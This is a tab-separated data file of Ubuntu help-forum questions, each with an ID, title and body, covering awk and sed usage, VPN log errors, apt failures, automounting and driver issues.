491360	awk search help	i need help with a simple awk script for matching letters on a lines . for example , finding separate matches for kj in one field and finding matches for kp in the next ? name vt kip rand nina k k kevdhekdmabr2738 nina j p pdbkemgwjsabeb483 nina a j meveahsbkdemjep48328 nina p k ehkmskdldadvsvpm46383 nina m p zbdamshasjerrj3738 nina j k amfjekspdbejd34549 nina p m pokjdokdam2452355235 as you can see the all the the rand column has a series of letters that match my needed letters . if have tried awk '/nina/ & & /k/ & & /j/ & & /k/ & & /p/ { print $ 0 } ' sampfile.txt is there a way to do this without referring to a specific column/field ?
491361	vpn connection problem on 14.04	i am new to ubuntu . i have configured vpn for pptp connection . but received following errors : 3 23:18:32 rana-laptop kernel : [ 933.399299 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:18:32 rana-laptop kernel : [ 933.399304 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:18:51 rana-laptop blueman-mechanism : exiting jul 3 23:19:24 rana-laptop kernel : [ 985.105165 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:19:24 rana-laptop kernel : [ 985.107417 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:19:24 rana-laptop kernel : [ 985.107432 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:20:16 rana-laptop kernel : [ 1036.816962 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:20:16 rana-laptop kernel : [ 1036.819187 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:20:16 rana-laptop kernel : [ 1036.819192 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:20:39 rana-laptop wpa_supplicant [ 1173 ] : message repeated 4 times : [ wlan0 : ctrl-event-scan-started ] jul 3 23:20:55 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : wpa : group rekeying completed with ba : b4:2e:4a:4f : f3 [ gtk=ccmp ] jul 3 23:21:07 rana-laptop kernel : [ 1088.528858 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:21:07 rana-laptop kernel : [ 1088.531105 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:21:07 rana-laptop kernel : [ 1088.531114 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:21:59 rana-laptop kernel : [ 1140.240949 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:21:59 rana-laptop kernel : [ 1140.243192 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:21:59 rana-laptop kernel : [ 1140.243197 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:22:39 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : ctrl-event-scan-started jul 3 23:22:51 rana-laptop kernel : [ 1191.953058 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:22:51 rana-laptop kernel : [ 1191.955292 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:22:51 rana-laptop kernel : [ 1191.955297 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:23:43 rana-laptop kernel : [ 1243.669071 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:23:43 rana-laptop kernel : [ 1243.671335 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:23:43 rana-laptop kernel : [ 1243.671342 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:24:34 rana-laptop kernel : [ 1295.380890 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:24:34 rana-laptop kernel : [ 1295.383138 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:24:34 rana-laptop kernel : [ 1295.383142 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:25:26 rana-laptop kernel : [ 1347.093112 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:25:26 rana-laptop kernel : [ 1347.095490 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:25:26 rana-laptop kernel : [ 1347.095494 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:26:18 rana-laptop kernel : [ 1398.804906 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:26:18 rana-laptop kernel : [ 1398.807133 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:26:18 rana-laptop kernel : [ 1398.807137 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:27:09 rana-laptop kernel : [ 1450.516937 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:27:09 rana-laptop kernel : [ 1450.519182 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:27:09 rana-laptop kernel : [ 1450.519185 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:28:01 rana-laptop kernel : [ 1502.228943 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:28:01 rana-laptop kernel : [ 1502.231179 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:28:01 rana-laptop kernel : [ 1502.231183 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:28:53 rana-laptop kernel : [ 1553.940850 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:28:53 rana-laptop kernel : [ 1553.943209 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:28:53 rana-laptop kernel : [ 1553.943213 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:29:44 rana-laptop kernel : [ 1605.653111 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:29:44 rana-laptop kernel : [ 1605.655362 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:29:44 rana-laptop kernel : [ 1605.655367 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:30:36 rana-laptop kernel : [ 1657.365019 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:30:36 rana-laptop kernel : [ 1657.367256 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:30:36 rana-laptop kernel : [ 1657.367260 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:30:39 rana-laptop wpa_supplicant [ 1173 ] : message repeated 4 times : [ wlan0 : ctrl-event-scan-started ] jul 3 23:30:55 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : wpa : group rekeying completed with ba : b4:2e:4a:4f : f3 [ gtk=ccmp ] jul 3 23:31:28 rana-laptop kernel : [ 1709.076983 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:31:28 rana-laptop kernel : [ 1709.079225 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:31:28 rana-laptop kernel : [ 1709.079229 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:32:20 rana-laptop kernel : [ 1760.788862 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:32:20 rana-laptop kernel : [ 1760.791107 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:32:20 rana-laptop kernel : [ 1760.791111 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:32:39 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : ctrl-event-scan-started jul 3 23:33:11 rana-laptop kernel : [ 1812.500948 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:33:11 rana-laptop kernel : [ 1812.503305 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:33:11 rana-laptop kernel : [ 1812.503309 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:34:03 rana-laptop kernel : [ 1864.209031 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:34:03 rana-laptop kernel : [ 1864.211405 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:34:03 rana-laptop kernel : [ 1864.211410 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:34:55 rana-laptop kernel : [ 1915.924935 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:34:55 rana-laptop kernel : [ 1915.927169 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:34:55 rana-laptop kernel : [ 1915.927173 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:35:31 rana-laptop compiz : pam_ecryptfs : seteuid error jul 3 23:35:46 rana-laptop kernel : [ 1967.636913 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:35:46 rana-laptop kernel : [ 1967.639154 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:35:46 rana-laptop kernel : [ 1967.639159 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:36:38 rana-laptop kernel : [ 2019.349008 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:36:38 rana-laptop kernel : [ 2019.351254 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:36:38 rana-laptop kernel : [ 2019.351258 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:37:30 rana-laptop kernel : [ 2071.061029 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:37:30 rana-laptop kernel : [ 2071.063277 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:37:30 rana-laptop kernel : [ 2071.063281 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:37:53 rana-laptop dbus [ 446 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) jul 3 23:37:54 rana-laptop dbus [ 446 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' jul 3 23:38:18 rana-laptop kernel : [ 2119.278590 ] usb 2-3 : usb disconnect , device number 3 jul 3 23:38:19 rana-laptop kernel : [ 2119.803552 ] sd 7:0:0:0 : [ sdc ] synchronizing scsi cache jul 3 23:38:19 rana-laptop kernel : [ 2119.803598 ] sd 7:0:0:0 : [ sdc ] jul 3 23:38:19 rana-laptop kernel : [ 2119.803602 ] result : hostbyte=did_no_connect driverbyte=driver_ok jul 3 23:38:19 rana-laptop udisksd [ 3197 ] : cleaning up mount point /media/rana/transcend ( device 8:33 no longer exist ) jul 3 23:38:22 rana-laptop kernel : [ 2122.769094 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:38:22 rana-laptop kernel : [ 2122.771338 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:38:22 rana-laptop kernel : [ 2122.771342 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:38:39 rana-laptop colord : automatic metadata add icc-d2c4368212b5b7a9b0e167aa7ceebc74 to xrandr-goldstar company ltd-e1942-303inrc5r542 jul 3 23:38:39 rana-laptop colord : device added : xrandr-goldstar company ltd-e1942-303inrc5r542 jul 3 23:39:01 rana-laptop cron [ 11253 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -x /usr/lib/php5/sessionclean ] & & [ -d /var/lib/php5 ] & & /usr/lib/php5/sessionclean /var/lib/php5 $ ( /usr/lib/php5/maxlifetime ) ) jul 3 23:39:13 rana-laptop kernel : [ 2174.484964 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:39:13 rana-laptop kernel : [ 2174.487206 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:39:13 rana-laptop kernel : [ 2174.487210 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:40:05 rana-laptop kernel : [ 2226.196949 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:40:05 rana-laptop kernel : [ 2226.199315 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:40:05 rana-laptop kernel : [ 2226.199319 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:40:39 rana-laptop wpa_supplicant [ 1173 ] : message repeated 4 times : [ wlan0 : ctrl-event-scan-started ] jul 3 23:40:55 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : wpa : group rekeying completed with ba : b4:2e:4a:4f : f3 [ gtk=ccmp ] jul 3 23:40:57 rana-laptop kernel : [ 2277.909123 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:40:57 rana-laptop kernel : [ 2277.911354 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:40:57 rana-laptop kernel : [ 2277.911358 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:41:48 rana-laptop kernel : [ 2329.621184 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:41:48 rana-laptop kernel : [ 2329.623427 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:41:48 rana-laptop kernel : [ 2329.623432 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:42:34 rana-laptop kernel : [ 2375.169420 ] perf samples too long ( 5001 > 5000 ) , lowering kernel.perf_event_max_sample_rate to 25000 jul 3 23:42:39 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : ctrl-event-scan-started jul 3 23:42:40 rana-laptop kernel : [ 2381.333071 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:42:40 rana-laptop kernel : [ 2381.335317 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:42:40 rana-laptop kernel : [ 2381.335321 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:43:32 rana-laptop kernel : [ 2433.044993 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:43:32 rana-laptop kernel : [ 2433.047237 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:43:32 rana-laptop kernel : [ 2433.047243 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:44:24 rana-laptop kernel : [ 2484.756958 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:44:24 rana-laptop kernel : [ 2484.759329 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:44:24 rana-laptop kernel : [ 2484.759333 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:44:32 rana-laptop udisksd [ 3197 ] : mounted /dev/sr0 at /media/rana/resource_cd on behalf of uid 1000 jul 3 23:44:34 rana-laptop dbus [ 446 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) jul 3 23:44:34 rana-laptop dbus [ 446 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' jul 3 23:44:47 rana-laptop udisksd [ 3197 ] : cleaning up mount point /media/rana/resource_cd ( device 11:0 is not mounted ) jul 3 23:44:47 rana-laptop udisksd [ 3197 ] : unmounted /dev/sr0 on behalf of uid 1000 jul 3 23:45:15 rana-laptop kernel : [ 2536.469075 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:45:15 rana-laptop kernel : [ 2536.471322 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:45:15 rana-laptop kernel : [ 2536.471326 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:46:07 rana-laptop kernel : [ 2588.181213 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:46:07 rana-laptop kernel : [ 2588.183453 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:46:07 rana-laptop kernel : [ 2588.183457 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:46:59 rana-laptop kernel : [ 2639.889076 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:46:59 rana-laptop kernel : [ 2639.891454 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:46:59 rana-laptop kernel : [ 2639.891460 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:47:50 rana-laptop kernel : [ 2691.601126 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:47:50 rana-laptop kernel : [ 2691.603652 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:47:50 rana-laptop kernel : [ 2691.603659 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:48:42 rana-laptop kernel : [ 2743.317140 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:48:42 rana-laptop kernel : [ 2743.319380 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:48:42 rana-laptop kernel : [ 2743.319385 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:49:34 rana-laptop kernel : [ 2795.025249 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:49:34 rana-laptop kernel : [ 2795.027507 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:49:34 rana-laptop kernel : [ 2795.027515 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:50:26 rana-laptop kernel : [ 2846.741064 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:50:26 rana-laptop kernel : [ 2846.743306 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:50:26 rana-laptop kernel : [ 2846.743310 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:50:39 rana-laptop wpa_supplicant [ 1173 ] : message repeated 4 times : [ wlan0 : ctrl-event-scan-started ] jul 3 23:50:55 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : wpa : group rekeying completed with ba : b4:2e:4a:4f : f3 [ gtk=ccmp ] jul 3 23:51:17 rana-laptop kernel : [ 2898.452989 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:51:17 rana-laptop kernel : [ 2898.455231 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:51:17 rana-laptop kernel : [ 2898.455235 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:52:09 rana-laptop kernel : [ 2950.164860 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:52:09 rana-laptop kernel : [ 2950.167271 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:52:09 rana-laptop kernel : [ 2950.167282 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:52:39 rana-laptop wpa_supplicant [ 1173 ] : wlan0 : ctrl-event-scan-started jul 3 23:53:01 rana-laptop kernel : [ 3001.877213 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:53:01 rana-laptop kernel : [ 3001.879461 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:53:01 rana-laptop kernel : [ 3001.879467 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through jul 3 23:53:52 rana-laptop kernel : [ 3053.589056 ] sd 0:0:0:0 : [ sda ] test wp failed , assume write enabled jul 3 23:53:52 rana-laptop kernel : [ 3053.591298 ] sd 0:0:0:0 : [ sda ] asking for cache data failed jul 3 23:53:52 rana-laptop kernel : [ 3053.591302 ] sd 0:0:0:0 : [ sda ] assuming drive cache : write through please help .
491367	what does smb/cifs mean in ubuntu gnome	every time i start my machine so many processes appear and at last of their name and job a small bracket is seen in which ever sentence ends with ok but seconds before the desktop appears a statement like starting smb/cifs active directory server appears and it ends with fail showing that that process failed my question is what does those abbrevations smb/cifs mean
491373	`` problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fus ''	i 'm trying to install the google talk plugin on ubuntu 14.04 . i 've been following this guide : http : //www.ubuntuupdates.org/ppa/google_talk_plugin when i do the last step , sudo apt-get install google-talkplugin , i get the following error : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . this does n't make sense . what does spotify have to do with installing google talk ?
491374	terminal : sudo : apt-get : command not found	this is my first post here , so let me be welcomed with a serious issue to be answered . lately some really bad things have been happening with my computer , having to do with lack of icons and all kinds of bad things going with my graphical interface . all the bad things in the appeal are accompanied by a certain disability of my terminal . i 'm using 12.04 with gnome classic view with no effects . let 's have a `` sudo apt-get update '' . i get `` sudo : apt-get : command not found '' message . and it is the way it goes with all my apt-get commands . so , guys - what can it mean ? how to fix this , especially concerning all the other problems i 'm experiencing ? with best regards from central europe , js
491378	add application to `` open with '' list	i 've looked through some of the answers to question close to mine , but none of them was satisfactory . as one could guess from the title , i 'm desperately trying to add to my `` open with '' list a certain application for a certain application type , namely i 'm talking about .sgf files which i want to be opened with qgo . i could have gone with kigo or other go applications , but qgo is the best to me . ( talking about the board game go , aka weiqi , aka baduk ) about those other answers which do n't help with this problem of mine : i ca n't append any % f to the exec line in any /usr/share/applications/qgo.desktop or similar , since no such file exists . i tried with ubuntu-tweak but it did n't work . qgo appears in my `` luncher/dash '' so the fourth answer here does n't work any help would really mean a lot . thank you very much ! d. p.s : i 'm on lts12.04
491382	restore qt integration after removing kde	restore gtk integration after removing kde ; this shows how to remove the kde-theme for gtk , and now i want to do the same for qt-applications . i have tried qt4-qtconfig , and it does not work . here is an example from a qt application ( krita ) : as you can see the button has kde style , and it had n't before i installed kde . so my question is ; how do i remove the kde button and menu-style in qt-applications , and restore to the default ? i have ubuntu 14.04 .
491385	how to change to next page when clicked on button	hi guys i 'm new in qml programming and i was just wondering how can i switch to an other page when the user clicks on my button . by the way how can i make a new page in the ubuntu sdk so that when the user clicks on the button goes to there . thanks
491388	what can we do with libre office presentation	i cant get the point what can we do by using libre office presentation is it as same as libre office writer . because when i operate i actually do not know what am i doing . can anyone help me for this
491390	customize terminal size without launching terminal	i changed my terminal size to a very large number and now the terminal keeps flickering at when launched and the menu on upper-left corner does n't show up ( my machine is ubuntu 12.04 ) is there any way i can change my terminal size without launching it ? i 've been looking for solutions and someone mentioned about gconf.xml file but in my ./gconf/apps folder there 's no such folder called gnome-terminal
491392	tgz -ubuntu file type	i 'm new in ubuntu and i have a question to ask : i wan na download a file the his type is : tgz . for example : androidstudio.tgz and in the site that 's says : for linux . is it gon na work on ubuntu ?
491393	how to block any site ?	i have installed a ubuntu 14.04 in my company , and i want to block websites in my browser firefox/chorme , but how can i do this ? thanks !
491395	akgregator probelms : try icon and favicons	i use akgregator in unity and i have two problems : i do n't see the try icon ( with the number of new messages ) : i do n't see the favicons of the feeds , but only the default icon : how to solve these problems ?
491396	frozen ubuntu resulted in hard drive failure ?	during installation ubuntu froze . i know all my data on the other drive is gone . so i put a new one in . i get the error insert boot media . i have gone into the bios and fixed everything . please help me out : |
491401	how do i install a .so file ? - newbie	i downloaded freeverb.tar.gz which contains a plugin library ( freeverb.so ) for audacity . i extracted the .tar.gz file to my downloads folder but i do n't know what to do next . there is no readme file or any other info contained in the .tar.gz file , just freeverb.so can you advise me how to get the freeverb.so installed into the correct folder for audacity to pick it up . thanks
491406	migration from keychain access	i would like to migrate from mac os x to ubuntu . all seems to be ok , except for keychain . is there any script which migrates them from apple `` keychain access '' to `` seahorse '' ?
491410	delete the whole line starting with a special character except for the first word	i have very recently started using linux and i am almost completely oblivious on sed commands . i need to edit a file that contains a bunch of long lines starting with the common character `` > '' and delete the rest of this line only keeping the first word but not touch any lines that do not start with `` > '' using sed command . in other words , i need to turn this ( only a part of the first entry for demonstration purposes ) : > yal001c tfc3 sgdid : s000000001 , chr i from 151006-147594,151166-151097 , genome release 64-1-1 , reverse complement , verified orf , `` largest of six subunits of the rna polymerase iii transcription initiation factor complex ( tfiiic ) ; part of the taub domain of tfiiic that binds dna at the boxb promoter sites of trna and similar genes ; cooperates with tfc6p in dna binding '' mvltiypdelvqivsdkiasnkgkitlnqlwdisgkyfdlsdkkvkqfvlscvilkkdie vycdgaip* into this : > yal001c mvltiypdelvqivsdkiasnkgkitlnqlwdisgkyfdlsdkkvkqfvlscvilkkdie vycdgaip*
491411	nvidia layout inconsistencies when saving to x configuration file ( ubuntu 14.04 )	i am having trouble saving to the x config file from the nvidia x server settings . when i click the `` save to x configuration file '' button , i get `` the current layout has some inconsistencies '' . under show details it says `` metamode 1 of screen 0 does not have an active display device '' . i have been trying to edit the resolution of my second monitor ( i 'm using a laptop ) and i believe this is getting in the way . does anyone know what this means and how i can fix it ?
491413	ms office 2003/wine/	ubuntu 12.04.2 , wine installed as administrator ( not root ) , ms office 2003 installed as administrator ( not root ) . word , excel , etc . work fine under administrator account but ca n't get either to run under a user account . from user account found path to winword.exe ( /home/administrator/.wine/drive_c/program files/microsoft office/office11 ) from terminal , execute : wine winword.exe error : iopl not enabled winecfg : configured library - gdiplus ( native , builtin ) then ( native , windows ) same error . should i reinstall ms office under user account ? what am i missing ?
491415	sierra wwan kernel module acting strangely	so a few days ago i installed zorin os ( basically , ubuntu with a windows-like desktop environment ) on my grandmother 's computer to save it from the slowness of windows 7 . now , since she uses an at & t usb modem ( sierra aircard 313u ) i have to load the sierra and sierra_net modules ( since they 're not loaded by default ) . so , i made this file in /etc/modprobe.d/sierra-wwan.conf : # load sierra kernel modules install sierra /sbin/modprobe sierra install sierra_net /sbin/modprobe sierra_net though , for some reason , it wo n't load the modules . after some hair pulling , i got desperate enough to just load the modules from an init.d script ( yeah , i know you 're supposed to use modprobe.d specifically for kernel modules , but i was desperate ) and it contained this : # /etc/init.d/sierra-wwan # load sierra kernel modules # yeah , yeah , i know it 's /etc/modprobe.d for kernel modules , do n't judge me modprobe sierra modprobe sierra_net now , at least the modules load ( as verified with lsmod | grep sierra ) , but the module wo n't actually do anything ( i.e . recognize the modem , connect to at & t , etc ... ) unless i login to my account , and reload the module with sudo modprobe -r sierra sierra_net ; sudo modprobe sierra sierra_net , logout , and log my grandmother in again . i have tried loading , then reloading using the init.d script ( and with a modprobe.d conf ) , but it only works if i do it manually .
491416	how to get gvfs to automount removable devices when not using unity or gnome shell	back in 13.04 i switched from using unity to using a gnome session with i3 . my setup is a based on this one . $ cat /usr/share/xsessions/gnome-i3.desktop [ desktop entry ] name=gnome with i3 comment=a gnome fallback mode session using i3 as the window manager . exec=gnome-session -- session=i3 tryexec=gnome-session icon= type=application $ cat /usr/share/gnome-session/sessions/i3.session [ gnome session ] name=gnome-i3 requiredcomponents=gnome-settings-daemon ; i3 ; back in 13.04 , and also in 13.10 , automounting worked just like in unity . if i plugged in a removable drive ( eg : a usb thumb drive ) it 'd mount at /media/ $ user/ $ volume_label . under 14.04 this still works if i use unity , but it no longer works in my preferred gnome+i3 session . if i start up nautilus ( in a gnome+i3 session ) after plugging in a drive i can see the not-mounted drive in the left pane , but it has no eject button . it also does not show up in the output of df . if i then click on the drive , an eject button appears , and it will also appear in the output of df . so it seems that nautilus mounts volumes `` on demand '' . i 've also found that i can run gvfs-mount -oi to see gvfs events as they happen , and when a drive is attached it generates a pair of events like this : drive connected : 'lexar usb flash drive' drive ( 0 ) : lexar usb flash drive type : gproxydrive ( gproxyvolumemonitorudisks2 ) ids : unix-device : '/dev/sdg' ... volume added : 'allmydataz' volume ( 0 ) : allmydataz type : gproxyvolume ( gproxyvolumemonitorudisks2 ) ids : class : 'device' unix-device : '/dev/sdg1' uuid : 'be64-1766' label : 'allmydataz' themed icons : ... symbolic themed icons : ... can_mount=1 can_eject=1 should_automount=1 sort_key=gvfs.time_detected_usec.1404417627659873 ( note the should_automount=1 bit , yet it still does not automount . ) i can then manually mount the drive with gvfs-mount -d /dev/sdg1 . so ... is there some pre-existing tool that ties these together , mounting the unix-device of all `` volume added '' events that have should_automount=1 ? that is , mounting removable volumes as they are added to the system ? note that i am not looking for a way to have things mount at login or at system startup . i want them to mount when plugged in .
491417	need help with network configuration	without much knowledge i decided to install ubuntu 14.04 but i 'm having trouble setting up the network . after configuring the ipv4 settings and mac address and clicking save nothing happened and when i went back to the settings the mac address was n't the one i set . no matter how many times i try to set it it just goes back to the previous one .
491421	firefox not working with ububtu 14.04 ?	i have installed ubuntu and all looks well , the wifi connected but firefox browser returns a 'page not found error ' when browsing . there is no firewall . previously , the machine was running windows 7 and firefox browser functioned as expected . any suggestions ?
491422	shell theme disabled gnome tweak tool	trying to install tron legacy theme but i am really stuck the shell theme is disabled its faded out : ) http : //half-left.deviantart.com/art/gnome-shell-tron-legacy-208220836 trying to install gnome-shell via ubuntu software center but its says dependency problem [ code ] gnome-shell : depends : libgjs0-libmozjs-24-0 maar het is een virtueel pakket depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) maar 1:4.0-0ubuntu11+kxstudio1 zal worden ge誰nstalleerd depends : libpulse0 ( > = 1:0.99.1 ) maar 1:4.0-0ubuntu11+kxstudio1 zal worden ge誰nstalleerd depends : libxi6 ( > = 2:1.2.99.4 ) maar 2:1.7.1.901-1ubuntu1 zal worden ge誰nstalleerd depends : gnome-shell-common ( = 3.12.1-0ubuntu1~trusty1 ) maar 3.12.1-0ubuntu1~trusty1 zal worden ge誰nstalleerd [ code ]
491423	installing ubuntu 14 alongside windows 7 does n't do a thing ?	ok , so i got the newest ubuntu iso and burn it on a dvd . when i start my pc , the ubuntu installation begins and i get to the part where you have to choose how to install ubuntu . i select `` install ubuntu 14 inside windows '' and it says `` restart to continue '' . after that , the system like reboots and tells me to remove the media drive and close the tray , witch i did . now , when the pc starts up again , it only goes to windows 7 and it does n't allow me to go to ubuntu ! can some one please help ! i did `` try out '' before that and it is compatible with my system . please help !
